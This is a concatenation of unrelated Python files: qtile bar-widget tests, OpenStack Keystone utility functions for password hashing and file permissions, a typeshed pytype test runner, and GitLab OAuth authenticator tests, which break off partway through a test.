    main = None
    keys = []
    mouse = []
    groups = [libqtile.config.Group("a")]
    layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
    floating_layout = libqtile.layout.floating.Floating()
    screens = [
        libqtile.config.Screen(
            left=libqtile.bar.Bar(
                [
                    # This widget doesn't support vertical orientation
                    ExampleWidget(),
                ],
                10
            ),
        )
    ]
def test_incompatible_widget(qtile_nospawn):
    """A widget that only supports horizontal orientation is rejected
    when placed in a vertical bar."""
    config = IncompatibleWidgetConf

    # Ensure that adding a widget that doesn't support the orientation of the
    # bar raises ConfigError
    with pytest.raises(libqtile.confreader.ConfigError):
        qtile_nospawn.create_manager(config)
class MultiStretchConf:
    """Config with two STRETCH spacers in one bar; creating a manager
    from it must raise ConfigError."""
    main = None
    keys = []
    mouse = []
    groups = [libqtile.config.Group("a")]
    layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
    floating_layout = libqtile.layout.floating.Floating()
    screens = [
        libqtile.config.Screen(
            top=libqtile.bar.Bar(
                [
                    libqtile.widget.Spacer(libqtile.bar.STRETCH),
                    libqtile.widget.Spacer(libqtile.bar.STRETCH),
                ],
                10
            ),
        )
    ]
def test_multiple_stretches(qtile_nospawn):
    """Two STRETCH widgets in the same bar are a configuration error."""
    config = MultiStretchConf

    # Ensure that adding two STRETCH widgets to the same bar raises ConfigError
    with pytest.raises(libqtile.confreader.ConfigError):
        qtile_nospawn.create_manager(config)
def test_basic(qtile_nospawn):
    """Fixed widgets around a STRETCH keep their offsets; the STRETCH
    fills the remaining 780px of an 800px-wide bar."""
    # Subclass instead of assigning to GeomConf.screens: mutating the
    # shared class attribute would leak this screen setup into every
    # other test that uses GeomConf.
    class config(GeomConf):
        screens = [
            libqtile.config.Screen(
                bottom=libqtile.bar.Bar(
                    [
                        ExampleWidget(),
                        libqtile.widget.Spacer(libqtile.bar.STRETCH),
                        ExampleWidget()
                    ],
                    10
                )
            )
        ]

    qtile_nospawn.start(config)

    i = qtile_nospawn.c.bar["bottom"].info()
    assert i["widgets"][0]["offset"] == 0
    assert i["widgets"][1]["offset"] == 10
    assert i["widgets"][1]["width"] == 780
    assert i["widgets"][2]["offset"] == 790
    libqtile.hook.clear()
def test_singlespacer(qtile_nospawn):
    """A lone STRETCH widget expands to the full 800px width of the bar."""
    # Subclass instead of assigning to GeomConf.screens: mutating the
    # shared class attribute would leak this screen setup into every
    # other test that uses GeomConf.
    class config(GeomConf):
        screens = [
            libqtile.config.Screen(
                bottom=libqtile.bar.Bar(
                    [
                        libqtile.widget.Spacer(libqtile.bar.STRETCH),
                    ],
                    10
                )
            )
        ]

    qtile_nospawn.start(config)

    i = qtile_nospawn.c.bar["bottom"].info()
    assert i["widgets"][0]["offset"] == 0
    assert i["widgets"][0]["width"] == 800
    libqtile.hook.clear()
def test_nospacer(qtile_nospawn):
    """Without a STRETCH widget, fixed widgets pack from the left edge."""
    # Subclass instead of assigning to GeomConf.screens: mutating the
    # shared class attribute would leak this screen setup into every
    # other test that uses GeomConf.
    class config(GeomConf):
        screens = [
            libqtile.config.Screen(
                bottom=libqtile.bar.Bar(
                    [
                        ExampleWidget(),
                        ExampleWidget()
                    ],
                    10
                )
            )
        ]

    qtile_nospawn.start(config)

    i = qtile_nospawn.c.bar["bottom"].info()
    assert i["widgets"][0]["offset"] == 0
    assert i["widgets"][1]["offset"] == 10
    libqtile.hook.clear()
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 - 2012 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import calendar
import grp
import hashlib
import json
import os
import pwd
import passlib.hash
import six
from keystone.common import config
from keystone.common import environment
from keystone import exception
from keystone.openstack.common import log
from keystone.openstack.common import strutils
from six import moves
CONF = config.CONF
LOG = log.getLogger(__name__)
def read_cached_file(filename, cache_info, reload_func=None):
    """Read from a file if it has been modified.

    :param cache_info: dictionary to hold opaque cache.
    :param reload_func: optional function to be called with data when
                        file is reloaded due to a modification.

    :returns: data from file.
    """
    mtime = os.path.getmtime(filename)
    if cache_info and mtime == cache_info.get('mtime'):
        # Cache hit: the file has not changed since the last read.
        return cache_info['data']
    with open(filename) as fap:
        cache_info['data'] = fap.read()
    cache_info['mtime'] = mtime
    if reload_func:
        reload_func(cache_info['data'])
    return cache_info['data']
class SmarterEncoder(json.JSONEncoder):
    """Help for JSON encoding dict-like objects."""
    def default(self, obj):
        # Python 2 mappings expose iteritems(); Python 3 (and six-style)
        # mappings expose items().  Accept either so dict-like objects
        # encode on both interpreter versions; the original iteritems-only
        # check silently rejected py3-style mappings.
        if not isinstance(obj, dict):
            if hasattr(obj, 'iteritems'):
                return dict(obj.iteritems())
            if hasattr(obj, 'items'):
                return dict(obj.items())
        return super(SmarterEncoder, self).default(obj)
def trunc_password(password):
    """Truncate passwords to the max_length.

    :param password: the plaintext password (any sliceable string type)
    :returns: at most ``CONF.identity.max_password_length`` characters
    :raises exception.ValidationError: if ``password`` has no length
        (e.g. is not a string)
    """
    max_length = CONF.identity.max_password_length
    try:
        if len(password) > max_length:
            LOG.warning(
                _('Truncating user password to %s characters.'), max_length)
        # Slicing is a no-op when the password is already short enough.
        return password[:max_length]
    except TypeError:
        raise exception.ValidationError(attribute='string', target='password')
def hash_access_key(access):
    """Return the SHA-256 hex digest of an EC2 access key id."""
    return hashlib.sha256(access).hexdigest()
def hash_user_password(user):
    """Hash a user dict's password without modifying the passed-in dict."""
    if user.get('password') is None:
        # Nothing to hash; hand back the original dict untouched.
        return user
    return dict(user, password=hash_password(user['password']))
def hash_ldap_user_password(user):
    """Hash a user dict's password without modifying the passed-in dict."""
    if user.get('password') is None:
        # Nothing to hash; hand back the original dict untouched.
        return user
    return dict(user, password=ldap_hash_password(user['password']))
def hash_password(password):
    """Hash a password. Hard."""
    truncated = trunc_password(password).encode('utf-8')
    # Values that already look like a sha512_crypt hash pass through
    # untouched instead of being double-hashed.
    if passlib.hash.sha512_crypt.identify(truncated):
        return truncated
    return passlib.hash.sha512_crypt.encrypt(truncated,
                                             rounds=CONF.crypt_strength)
def ldap_hash_password(password):
    """Hash a password. Hard."""
    return passlib.hash.ldap_salted_sha1.encrypt(
        trunc_password(password).encode('utf-8'))
def ldap_check_password(password, hashed):
    """Verify a plaintext password against an LDAP salted-SHA1 hash."""
    if password is None:
        return False
    candidate = trunc_password(password).encode('utf-8')
    return passlib.hash.ldap_salted_sha1.verify(candidate, hashed)
def check_password(password, hashed):
    """Check that a plaintext password matches hashed.

    hashpw returns the salt value concatenated with the actual hash value.
    It extracts the actual salt if this value is then passed as the salt.
    """
    if password is None or hashed is None:
        return False
    candidate = trunc_password(password).encode('utf-8')
    return passlib.hash.sha512_crypt.verify(candidate, hashed)
def attr_as_boolean(val_attr):
    """Returns the boolean value, decoded from a string.

    We test explicitly for a value meaning False, which can be one of
    several formats as specified in oslo strutils.FALSE_STRINGS.
    All other string values (including an empty string) are treated as
    meaning True.
    """
    # default=True makes unrecognized values (and '') come back truthy.
    return strutils.bool_from_string(val_attr, default=True)
# From python 2.7
def check_output(*popenargs, **kwargs):
    r"""Run command with arguments and return its output as a byte string.

    Backport of subprocess.check_output for interpreters that predate it,
    routed through keystone's environment.subprocess wrapper.

    If the exit code was non-zero it raises a CalledProcessError.  The
    CalledProcessError object will have the return code in the returncode
    attribute and output in the output attribute.

    The arguments are the same as for the Popen constructor.  Example:

    >>> check_output(['ls', '-l', '/dev/null'])
    'crw-rw-rw- 1 root  root 1, 3 Oct 18  2007 /dev/null\n'

    The stdout argument is not allowed as it is used internally.
    To capture standard error in the result, use stderr=STDOUT.

    >>> import sys
    >>> check_output(['/bin/sh', '-c',
    ...               'ls -l non_existent_file ; exit 0'],
    ...              stderr=sys.STDOUT)
    'ls: non_existent_file: No such file or directory\n'
    """
    if 'stdout' in kwargs:
        raise ValueError('stdout argument not allowed, it will be overridden.')
    LOG.debug(' '.join(popenargs[0]))
    process = environment.subprocess.Popen(stdout=environment.subprocess.PIPE,
                                           *popenargs, **kwargs)
    output, unused_err = process.communicate()
    retcode = process.poll()
    if retcode:
        # Prefer the explicit args= kwarg for the error report when given.
        cmd = kwargs.get('args')
        if cmd is None:
            cmd = popenargs[0]
        raise environment.subprocess.CalledProcessError(retcode, cmd)
    return output
def get_blob_from_credential(credential):
    """Decode and validate a credential's JSON blob.

    :raises exception.ValidationError: when the blob is not valid JSON or
        does not decode to a non-empty dict.
    """
    try:
        blob = json.loads(credential.blob)
    except (ValueError, TypeError):
        raise exception.ValidationError(
            message=_('Invalid blob in credential'))
    if not isinstance(blob, dict) or not blob:
        raise exception.ValidationError(attribute='blob',
                                        target='credential')
    return blob
def convert_ec2_to_v3_credential(ec2credential):
    """Translate an EC2 credential row into the v3 credential format."""
    blob = json.dumps({'access': ec2credential.access,
                       'secret': ec2credential.secret})
    return {
        # The credential id is derived from the access key.
        'id': hash_access_key(ec2credential.access),
        'user_id': ec2credential.user_id,
        'project_id': ec2credential.tenant_id,
        'blob': blob,
        'type': 'ec2',
        'extra': json.dumps({}),
    }
def convert_v3_to_ec2_credential(credential):
    """Translate a v3 credential into the EC2 credential format."""
    blob = get_blob_from_credential(credential)
    return {
        'access': blob.get('access'),
        'secret': blob.get('secret'),
        'user_id': credential.user_id,
        'tenant_id': credential.project_id,
    }
def git(*args):
    """Run a git subcommand and return its output (see check_output)."""
    return check_output(['git'] + list(args))
def unixtime(dt_obj):
    """Convert a datetime object (treated as UTC) to a Unix timestamp.

    :param dt_obj: datetime.datetime object
    :returns: seconds since the epoch
    """
    utc_tuple = dt_obj.utctimetuple()
    return calendar.timegm(utc_tuple)
def auth_str_equal(provided, known):
    """Constant-time string comparison.

    :params provided: the first string
    :params known: the second string
    :return: True if the strings are equal.

    This function takes two strings and compares them.  It is intended to
    be used when doing a comparison for authentication purposes to help
    guard against timing attacks.  When using the function for this
    purpose, always provide the user-provided password as the first
    argument.  The time this function will take is always a factor of the
    length of this string.
    """
    p_len = len(provided)
    k_len = len(known)
    result = 0
    # Builtin range works on both py2 and py3, removing the six.moves
    # dependency here; the original `i < p_len` guard on `a` was dead
    # code since i always ranges over [0, p_len).
    for i in range(p_len):
        a = ord(provided[i])
        # Read past the end of `known` as 0 so the loop length depends
        # only on `provided`.
        b = ord(known[i]) if i < k_len else 0
        result |= a ^ b
    return (p_len == k_len) & (result == 0)
def setup_remote_pydev_debug():
    """Attach this process to a remote pydev debugger if configured.

    No-op (returns None) when the pydev host/port options are unset.
    Returns True once a trace is established; any setup failure is
    logged and then re-raised.
    """
    if CONF.pydev_debug_host and CONF.pydev_debug_port:
        try:
            try:
                from pydev import pydevd
            except ImportError:
                # Some pydev distributions expose the module at top level.
                import pydevd

            pydevd.settrace(CONF.pydev_debug_host,
                            port=CONF.pydev_debug_port,
                            stdoutToServer=True,
                            stderrToServer=True)
            return True
        except Exception:
            LOG.exception(_(
                'Error setting up the debug environment. Verify that the '
                'option --debug-url has the format <host>:<port> and that a '
                'debugger processes is listening on that port.'))
            raise
class LimitingReader(object):
    """Reader to limit the size of an incoming request."""

    def __init__(self, data, limit):
        """Wrap ``data`` and enforce a byte budget on reads.

        :param data: underlying data object (iterable / file-like)
        :param limit: maximum number of bytes the reader should allow
        """
        self.data = data
        self.limit = limit
        self.bytes_read = 0

    def __iter__(self):
        for chunk in self.data:
            self.bytes_read += len(chunk)
            if self.bytes_read > self.limit:
                raise exception.RequestTooLarge()
            yield chunk

    def read(self, i=None):
        # NOTE(jamielennox): We can't simply provide the default to the
        # read() call as the expected default differs between mod_wsgi
        # and eventlet, so dispatch explicitly instead.
        result = self.data.read() if i is None else self.data.read(i)
        self.bytes_read += len(result)
        if self.bytes_read > self.limit:
            raise exception.RequestTooLarge()
        return result
def get_unix_user(user=None):
    '''Get the uid and user name.

    This is a convenience utility which accepts a variety of input
    which might represent a unix user. If successful it returns the uid
    and name. Valid input is:

    string
        A string is first considered to be a user name and a lookup is
        attempted under that name. If no name is found then an attempt
        is made to convert the string to an integer and perform a
        lookup as a uid.

    int
        An integer is interpretted as a uid.

    None
        None is interpreted to mean use the current process's
        effective user.

    If the input is a valid type but no user is found a KeyError is
    raised. If the input is not a valid type a TypeError is raised.

    :param object user: string, int or None specifying the user to
                        lookup.

    :return: tuple of (uid, name)
    '''
    if isinstance(user, six.string_types):
        try:
            user_info = pwd.getpwnam(user)
        except KeyError:
            # Was an int passed as a string?
            # Try converting to int and lookup by uid instead.
            try:
                i = int(user)
            except ValueError:
                raise KeyError("user name '%s' not found" % user)
            try:
                user_info = pwd.getpwuid(i)
            except KeyError:
                raise KeyError("user id %d not found" % i)
    elif isinstance(user, int):
        try:
            user_info = pwd.getpwuid(user)
        except KeyError:
            raise KeyError("user id %d not found" % user)
    elif user is None:
        # Default to the current process's effective user.
        user_info = pwd.getpwuid(os.geteuid())
    else:
        raise TypeError('user must be string, int or None; not %s (%r)' %
                        (user.__class__.__name__, user))

    return user_info.pw_uid, user_info.pw_name
def get_unix_group(group=None):
    '''Get the gid and group name.

    This is a convenience utility which accepts a variety of input
    which might represent a unix group. If successful it returns the gid
    and name. Valid input is:

    string
        A string is first considered to be a group name and a lookup is
        attempted under that name. If no name is found then an attempt
        is made to convert the string to an integer and perform a
        lookup as a gid.

    int
        An integer is interpretted as a gid.

    None
        None is interpreted to mean use the current process's
        effective group.

    If the input is a valid type but no group is found a KeyError is
    raised. If the input is not a valid type a TypeError is raised.

    :param object group: string, int or None specifying the group to
                         lookup.

    :return: tuple of (gid, name)
    '''
    if isinstance(group, six.string_types):
        try:
            group_info = grp.getgrnam(group)
        except KeyError:
            # Was an int passed as a string?
            # Try converting to int and lookup by id instead.
            try:
                i = int(group)
            except ValueError:
                raise KeyError("group name '%s' not found" % group)
            try:
                group_info = grp.getgrgid(i)
            except KeyError:
                raise KeyError("group id %d not found" % i)
    elif isinstance(group, int):
        try:
            group_info = grp.getgrgid(group)
        except KeyError:
            raise KeyError("group id %d not found" % group)
    elif group is None:
        # Default to the current process's effective group.
        group_info = grp.getgrgid(os.getegid())
    else:
        raise TypeError('group must be string, int or None; not %s (%r)' %
                        (group.__class__.__name__, group))

    return group_info.gr_gid, group_info.gr_name
def set_permissions(path, mode=None, user=None, group=None, log=None):
    '''Set the ownership and permissions on the pathname.

    Each of the mode, user and group are optional, if None then
    that aspect is not modified.

    Owner and group may be specified either with a symbolic name
    or numeric id.

    :param string path: Pathname of directory whose existence is assured.
    :param object mode: ownership permissions flags (int) i.e. chmod,
                        if None do not set.
    :param object user: set user, name (string) or uid (integer),
                        if None do not set.
    :param object group: set group, name (string) or gid (integer)
                         if None do not set.
    :param logger log: logging.logger object, used to emit log messages,
                       if None no logging is performed.

    :raises KeyError: if the user/group cannot be resolved.
    :raises EnvironmentError: if chown or chmod fails.
    '''
    # Resolve symbolic names to ids up front so failures happen before
    # any modification is attempted.
    if user is None:
        user_uid, user_name = None, None
    else:
        user_uid, user_name = get_unix_user(user)

    if group is None:
        group_gid, group_name = None, None
    else:
        group_gid, group_name = get_unix_group(group)

    if log:
        if mode is None:
            mode_string = str(mode)
        else:
            mode_string = oct(mode)
        log.debug("set_permissions: "
                  "path='%s' mode=%s user=%s(%s) group=%s(%s)",
                  path, mode_string,
                  user_name, user_uid, group_name, group_gid)

    # Change user and group if specified
    if user_uid is not None or group_gid is not None:
        # os.chown treats -1 as "leave this id unchanged".
        if user_uid is None:
            user_uid = -1
        if group_gid is None:
            group_gid = -1
        try:
            os.chown(path, user_uid, group_gid)
        except OSError as exc:
            raise EnvironmentError("chown('%s', %s, %s): %s" %
                                   (path,
                                    user_name, group_name,
                                    exc.strerror))

    # Change permission flags
    if mode is not None:
        try:
            os.chmod(path, mode)
        except OSError as exc:
            raise EnvironmentError("chmod('%s', %#o): %s" %
                                   (path, mode, exc.strerror))
def make_dirs(path, mode=None, user=None, group=None, log=None):
    '''Assure directory exists, set ownership and permissions.

    Assure the directory exists and optionally set it's ownership
    and permissions.

    Each of the mode, user and group are optional, if None then
    that aspect is not modified.

    Owner and group may be specified either with a symbolic name
    or numeric id.

    :param string path: Pathname of directory whose existence is assured.
    :param object mode: ownership permissions flags (int) i.e. chmod,
                        if None do not set.
    :param object user: set user, name (string) or uid (integer),
                        if None do not set.
    :param object group: set group, name (string) or gid (integer)
                         if None do not set.
    :param logger log: logging.logger object, used to emit log messages,
                       if None no logging is performed.
    '''
    if log:
        mode_string = str(mode) if mode is None else oct(mode)
        log.debug("make_dirs path='%s' mode=%s user=%s group=%s",
                  path, mode_string, user, group)

    if not os.path.exists(path):
        try:
            os.makedirs(path)
        except OSError as exc:
            raise EnvironmentError("makedirs('%s'): %s" % (path, exc.strerror))

    # Apply ownership/permissions even when the directory pre-existed.
    set_permissions(path, mode, user, group, log)
| |
#!/usr/bin/env python
r"""Test runner for typeshed.
Depends on mypy and pytype being installed.
If pytype is installed:
1. For every pyi, do nothing if it is in pytype_blacklist.txt.
2. If the blacklist line has a "# parse only" comment run
"pytd <foo.pyi>" in a separate process.
3. If the file is not in the blacklist run
"pytype --typeshed-location=typeshed_location --module-name=foo \
--convert-to-pickle=tmp_file <foo.pyi>.
Option two will parse the file, mostly syntactical correctness. Option three
will load the file and all the builtins, typeshed dependencies. This will
also discover incorrect usage of imported modules.
"""
import argparse
import collections
import itertools
import os
import re
import subprocess
import sys
# Command-line interface for the typeshed/pytype test runner.
parser = argparse.ArgumentParser(description='Pytype/typeshed tests.')
parser.add_argument('-n', '--dry-run', action='store_true',
                    help="Don't actually run tests")
parser.add_argument('--num-parallel', type=int, default=1,
                    help='Number of test processes to spawn')
# Default to '' so that symlinking typeshed subdirs in cwd will work.
parser.add_argument('--typeshed-location', type=str, default='',
                    help='Path to typeshed installation.')
# Default to '' so that finding pytype in path will work.
parser.add_argument('--pytype-bin-dir', type=str, default='',
                    help='Path to directory with pytype and pytd executables.')
# Set to true to print a stack trace every time an exception is thrown.
parser.add_argument('--print-stderr', type=bool, default=False,
                    help='Print stderr every time an error is encountered.')
# We need to invoke python3.6. The default here works with our travis tests.
parser.add_argument('--python36-exe', type=str,
                    default='/opt/python/3.6/bin/python3.6',
                    help='Path to a python 3.6 interpreter.')

# (pytype_bin_dir, typeshed_dir) pair resolved from the CLI flags.
Dirs = collections.namedtuple('Dirs', ['pytype', 'typeshed'])
# Top-level typeshed directories containing stub packages.
TYPESHED_SUBDIRS = ['stdlib', 'third_party']
def main():
    """Run the pytype tests and turn the results into an exit status."""
    args = parser.parse_args()
    code, runs = pytype_test(args)

    if code:
        # Propagate the worst pytype exit code.
        print('--- exit status %d ---' % code)
        sys.exit(code)
    if not runs:
        # Zero runs means the setup was wrong (missing dirs/binaries).
        print('--- nothing to do; exit 1 ---')
        sys.exit(1)
def get_project_dirs(args):
    """Top-level project directories for pytype executables and typeshed."""
    typeshed = args.typeshed_location or os.getcwd()
    return Dirs(pytype=args.pytype_bin_dir, typeshed=typeshed)
class PathMatcher(object):
    """Matches paths against any of a set of patterns anchored at the end."""

    def __init__(self, patterns):
        if not patterns:
            # No patterns: match nothing.
            self.matcher = None
        else:
            self.matcher = re.compile('(%s)$' % '|'.join(patterns))

    def search(self, path):
        if self.matcher is None:
            return False
        return self.matcher.search(path)
def load_blacklist(dirs):
    """Parse tests/pytype_blacklist.txt into (skip, parse_only) lists."""
    filename = os.path.join(dirs.typeshed, 'tests', 'pytype_blacklist.txt')
    skip_re = re.compile(r'^\s*([^\s#]+)\s*(?:#.*)?$')
    parse_only_re = re.compile(r'^\s*([^\s#]+)\s*#\s*parse only\s*')
    skip, parse_only = [], []

    with open(filename) as f:
        for line in f:
            # "# parse only" entries take precedence over plain entries.
            m = parse_only_re.match(line)
            if m:
                parse_only.append(m.group(1))
                continue
            m = skip_re.match(line)
            if m:
                skip.append(m.group(1))

    return skip, parse_only
class BinaryRun(object):
    """Launches a command in a subprocess (or fakes success on dry runs)."""

    def __init__(self, args, dry_run=False, env=None):
        self.args = args
        self.results = None

        if dry_run:
            # Pretend the command succeeded with no output.
            self.results = (0, '', '')
            return

        full_env = None
        if env is not None:
            full_env = os.environ.copy()
            full_env.update(env)
        self.proc = subprocess.Popen(
            self.args,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            env=full_env)

    def communicate(self):
        """Return (returncode, stdout, stderr), waiting on the first call."""
        if self.results:
            return self.results

        stdout, stderr = self.proc.communicate()
        self.results = self.proc.returncode, stdout, stderr
        return self.results
def _get_relative(filename):
    """Strip any path prefix preceding the typeshed subdir component."""
    top = 0
    for subdir in TYPESHED_SUBDIRS:
        try:
            top = filename.index(subdir)
        except ValueError:
            continue
        # Found a subdir; stop at the first match.
        break
    return filename[top:]
def _get_module_name(filename):
    """Converts a filename {subdir}/m.n/module/foo to module.foo."""
    parts = _get_relative(filename).split(os.path.sep)[2:]
    return '.'.join(parts).replace('.pyi', '').replace('.__init__', '')
def can_run(path, exe, *args):
    """Return True when `exe` under `path` can be launched with `args`."""
    try:
        BinaryRun([os.path.join(path, exe)] + list(args)).communicate()
    except OSError:
        return False
    return True
def _is_version(path, version):
    """True when `path` lies under a {subdir}/{version}/ directory."""
    for subdir in TYPESHED_SUBDIRS:
        if '%s/%s' % (subdir, version) in path:
            return True
    return False
def pytype_test(args):
    """Run pytype (and pytd for parse-only files) over the typeshed stubs.

    :returns: tuple of (max exit code seen, number of test runs).
        (0, 0) signals a setup problem (missing dirs or executables).
    """
    dirs = get_project_dirs(args)
    pytype_exe = os.path.join(dirs.pytype, 'pytype-single')
    paths = [os.path.join(dirs.typeshed, d) for d in TYPESHED_SUBDIRS]

    # Sanity-check the environment before collecting any files.
    for p in paths:
        if not os.path.isdir(p):
            print('Cannot find typeshed subdir at %s '
                  '(specify parent dir via --typeshed_location)' % p)
            return 0, 0

    # The pytd parser binary was renamed over time; accept either name.
    if can_run(dirs.pytype, 'pytd', '-h'):
        pytd_exe = os.path.join(dirs.pytype, 'pytd')
    elif can_run(dirs.pytype, 'pytd_tool', '-h'):
        pytd_exe = os.path.join(dirs.pytype, 'pytd_tool')
    else:
        print('Cannot run pytd. Did you install pytype?')
        return 0, 0

    if not can_run('', args.python36_exe, '--version'):
        print('Cannot run python3.6 from %s. (point to a valid executable via '
              '--python36-exe)' % args.python36_exe)
        return 0, 0

    # Only stdlib stubs plus the six and mypy_extensions third-party stubs
    # are checked.
    stdlib = 'stdlib/'
    six = 'third_party/.*/six/'
    mypy_extensions = 'third_party/.*/mypy_extensions'
    wanted = re.compile(
        r'(?:%s).*\.pyi$' % '|'.join([stdlib, six, mypy_extensions]))
    skip, parse_only = load_blacklist(dirs)
    skipped = PathMatcher(skip)
    parse_only = PathMatcher(parse_only)

    pytype_run = []
    pytd_run = []
    bad = []

    def _make_test(filename, major_version):
        """Build the pytype BinaryRun for one stub at one Python version."""
        run_cmd = [
            pytype_exe,
            '--module-name=%s' % _get_module_name(filename),
            '--parse-pyi',
        ]
        if major_version == 3:
            run_cmd += [
                '-V 3.6',
                '--python_exe=%s' % args.python36_exe,
            ]
        return BinaryRun(run_cmd + [filename],
                         dry_run=args.dry_run,
                         env={"TYPESHED_HOME": dirs.typeshed})

    # Collect the stub files, splitting them into full-check vs parse-only.
    for root, _, filenames in itertools.chain.from_iterable(
            os.walk(p) for p in paths):
        for f in sorted(filenames):
            f = os.path.join(root, f)
            rel = _get_relative(f)
            if wanted.search(rel):
                if parse_only.search(rel):
                    pytd_run.append(f)
                elif not skipped.search(rel):
                    pytype_run.append(f)

    running_tests = collections.deque()
    max_code, runs, errors = 0, 0, 0
    files = pytype_run + pytd_run
    total_tests = len(files)
    # Files in {subdir}/2and3 get tested twice
    total_tests += sum(1 for f in pytype_run if _is_version(f, '2and3'))
    print("Testing files with pytype...")
    # Simple scheduler: keep up to --num-parallel subprocesses in flight,
    # reaping the oldest one each iteration.
    while 1:
        while files and len(running_tests) < args.num_parallel:
            f = files.pop()
            if f in pytype_run:
                # Version-specific stubs run under their Python version;
                # 2and3 stubs run under both.
                if _is_version(f, '2and3'):
                    running_tests.append(_make_test(f, 2))
                    running_tests.append(_make_test(f, 3))
                elif _is_version(f, '2'):
                    running_tests.append(_make_test(f, 2))
                elif _is_version(f, '3'):
                    running_tests.append(_make_test(f, 3))
                else:
                    print("Unrecognised path: %s" % f)
            elif f in pytd_run:
                test_run = BinaryRun([pytd_exe, f], dry_run=args.dry_run)
                running_tests.append(test_run)
            else:
                raise ValueError('Unknown action for file: %s' % f)

        if not running_tests:
            break

        test_run = running_tests.popleft()
        code, _, stderr = test_run.communicate()
        max_code = max(max_code, code)
        runs += 1
        if code:
            if args.print_stderr:
                print(stderr)
            errors += 1
            # We strip off the stack trace and just leave the last line with the
            # actual error; to see the stack traces use --print_stderr.
            bad.append((_get_relative(test_run.args[-1]),
                        stderr.rstrip().rsplit('\n', 1)[-1]))
        # Periodic progress indicator.
        if runs % 25 == 0:
            print("  %3d/%d with %3d errors" % (runs, total_tests, errors))

    print('Ran pytype with %d pyis, got %d errors.' % (runs, errors))
    for f, err in bad:
        print('%s: %s' % (f, err))
    return max_code, runs
# Script entry point.
if __name__ == '__main__':
    main()
| |
import re
import json
from io import BytesIO
import functools
import collections
from urllib.parse import urlparse, parse_qs
from tornado.httpclient import HTTPResponse
from tornado.httputil import HTTPHeaders
from pytest import fixture, mark
from ..gitlab import GitLabOAuthenticator, GITLAB_API_VERSION
from .mocks import setup_oauth_mock
API_ENDPOINT = '/api/v%s' % (GITLAB_API_VERSION,)
def user_model(username, id=1, is_admin=False):
    """Return a user model"""
    model = {
        'username': username,
        'id': id,
    }
    if is_admin:
        # Some versions of the API do not return the is_admin property
        # for non-admin users (See #115).
        model['is_admin'] = True
    return model
@fixture
def gitlab_client(client):
    """Pytest fixture: the shared mock HTTP client wired up with GitLab's
    OAuth token and user endpoints (see .mocks.setup_oauth_mock)."""
    setup_oauth_mock(client,
                     host='gitlab.com',
                     access_token_path='/oauth/token',
                     user_path=API_ENDPOINT + '/user',
                     )
    return client
def mock_api_version(client, version):
    """Register a handler on the mock client serving /api/vX/version."""
    def version_handler(request):
        payload = {'version': version, 'revision': "f79c1794977"}
        body = BytesIO(json.dumps(payload).encode('utf-8'))
        return HTTPResponse(request, 200,
                            headers={'Content-Type': 'application/json'},
                            buffer=body)

    client.hosts['gitlab.com'].append(
        (re.compile(API_ENDPOINT + '/version'), version_handler))
async def test_gitlab(gitlab_client):
    """Happy path: a plain GitLab user authenticates and auth_state is populated."""
    authenticator = GitLabOAuthenticator()
    mock_api_version(gitlab_client, '12.3.1-ee')
    handler = gitlab_client.handler_for_user(user_model('wash'))
    user_info = await authenticator.authenticate(handler)
    assert sorted(user_info) == ['auth_state', 'name']
    name = user_info['name']
    assert name == 'wash'
    auth_state = user_info['auth_state']
    assert 'access_token' in auth_state
    assert 'gitlab_user' in auth_state
def make_link_header(urlinfo, page):
    """Build a GitLab-style pagination ``Link`` header pointing at *page*."""
    next_url = '%s://%s%s?page=%s' % (
        urlinfo.scheme, urlinfo.netloc, urlinfo.path, page)
    return {'Link': '<%s>;rel="next"' % next_url}
async def test_group_whitelist(gitlab_client):
    """gitlab_group_whitelist: only members of whitelisted groups may log in.

    Exercises both the non-paginated and paginated group-listing code paths.
    """
    client = gitlab_client
    authenticator = GitLabOAuthenticator()
    mock_api_version(client, '12.4.0-ee')

    ## set up fake Gitlab API
    # username -> groups the user belongs to; a user's id is their
    # insertion position + 1 (see group_user_model / is_member).
    user_groups = collections.OrderedDict({
        'grif': ['red', 'yellow'],
        'simmons': ['red', 'yellow'],
        'caboose': ['blue', 'yellow'],
        'burns': ['blue', 'yellow'],
    })

    def group_user_model(username, is_admin=False):
        return user_model(username,
                          list(user_groups.keys()).index(username) + 1,
                          is_admin)

    member_regex = re.compile(API_ENDPOINT + r'/groups/(.*)/members/all/(.*)')

    def is_member(request):
        # 200 when the uid's user belongs to the group, 404 otherwise.
        urlinfo = urlparse(request.url)
        group, uid = member_regex.match(urlinfo.path).group(1, 2)
        uname = list(user_groups.keys())[int(uid) - 1]
        if group in user_groups[uname]:
            return HTTPResponse(request, 200)
        else:
            return HTTPResponse(request, 404)

    def groups(paginate, request):
        # Mock of the /groups endpoint, optionally one group per page.
        urlinfo = urlparse(request.url)
        _, token = request._headers.get('Authorization').split()
        user = client.access_tokens[token]['username']
        if not paginate:
            return [{'path': group} for group in user_groups[user]]
        else:
            page = parse_qs(urlinfo.query).get('page', ['1'])
            page = int(page[0])
            return groups_paginated(user, page, urlinfo,
                                    functools.partial(HTTPResponse, request))

    def groups_paginated(user, page, urlinfo, response):
        # Emit a Link header for every page except the last.
        if page < len(user_groups[user]):
            headers = make_link_header(urlinfo, page + 1)
        elif page == len(user_groups[user]):
            headers = {}
        else:
            return response(400)
        headers.update({'Content-Type': 'application/json'})
        ret = [{'path': user_groups[user][page - 1]}]
        return response(200, headers=HTTPHeaders(headers),
                        buffer=BytesIO(json.dumps(ret).encode('utf-8')))

    client.hosts['gitlab.com'].append(
        (member_regex, is_member)
    )

    ## actual tests
    for paginate in (False, True):
        client.hosts['gitlab.com'].append(
            (API_ENDPOINT + '/groups', functools.partial(groups, paginate))
        )

        authenticator.gitlab_group_whitelist = ['blue']
        handler = client.handler_for_user(group_user_model('caboose'))
        user_info = await authenticator.authenticate(handler)
